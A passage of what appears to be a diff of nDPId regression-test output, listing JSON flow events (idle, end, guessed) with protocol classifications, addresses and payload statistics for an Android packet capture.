{"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454871745,"flow_last_seen":1582454871859,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":755,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":13,"flow_first_seen":1582454871094,"flow_last_seen":1582454871395,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":1510,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36834,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454871745,"flow_last_seen":1582454871859,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":458,"flow_tot_l4_payload_len":755,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36848,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.DataSaver","breed":"Fun","category":"Web"}} 
+00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"},"http": {}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1582454871772,"flow_last_seen":1582454871808,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"173.194.79.114","src_port":36850,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1582454796360,"flow_last_seen":1582454856384,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 
-00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1582454868511,"flow_last_seen":1582454870126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1582454868527,"flow_last_seen":1582454869366,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"}} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":16,"flow_first_seen":1582454868511,"flow_last_seen":1582454870126,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1582454868527,"flow_last_seen":1582454869366,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4841,"flow_avg_l4_payload_len":302,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"ConnCheck"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867323,"flow_last_seen":1582454867358,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.35.8","src_port":45863,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}} 00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871881,"flow_last_seen":1582454871920,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":39760,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} 00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871343,"flow_last_seen":1582454871383,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35689,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454867244,"flow_last_seen":1582454867284,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":98,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":35825,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454872021,"flow_last_seen":1582454872022,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":56312,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} -00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7440000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454769772,"flow_last_seen":1582454769772,"flow_idle_time":7560000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"95.101.24.53","dst_ip":"192.168.2.17","src_port":443,"dst_port":50677,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"Google","breed":"Acceptable","category":"Web"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454869626,"flow_last_seen":1582454870649,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":49510,"dst_port":5228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866803,"flow_last_seen":1582454871058,"flow_idle_time":120000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::2","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} 00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454866803,"flow_last_seen":1582454866894,"flow_idle_time":120000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":56,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip6","src_ip":"fe80::4e6a:f6ff:fe9f:f627","dst_ip":"ff02::16","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871553,"flow_last_seen":1582454871667,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} -00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871829,"flow_last_seen":1582454872026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} -00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871553,"flow_last_seen":1582454871667,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43634,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} +00682{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1582454871829,"flow_last_seen":1582454872026,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3573,"flow_avg_l4_payload_len":255,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} +00646{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by 
IP"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454872031,"flow_last_seen":1582454872031,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.76","src_port":43652,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871292,"flow_last_seen":1582454871294,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":46359,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"}} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454871103,"flow_last_seen":1582454871450,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5661,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} -00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1582454871814,"flow_last_seen":1582454872019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":3276,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1582454871103,"flow_last_seen":1582454871450,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":5661,"flow_avg_l4_payload_len":209,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51928,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} 
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1582454871814,"flow_last_seen":1582454872019,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":594,"flow_tot_l4_payload_len":3276,"flow_avg_l4_payload_len":136,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.21.202","src_port":51944,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DataSaver","breed":"Fun","category":"Web"}} 00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871061,"flow_last_seen":1582454871100,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":58,"flow_tot_l4_payload_len":100,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":7660,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.DataSaver","breed":"Fun","category":"Web"}} 00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"android.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454871600,"flow_last_seen":1582454871601,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1582454872047,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":58892,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
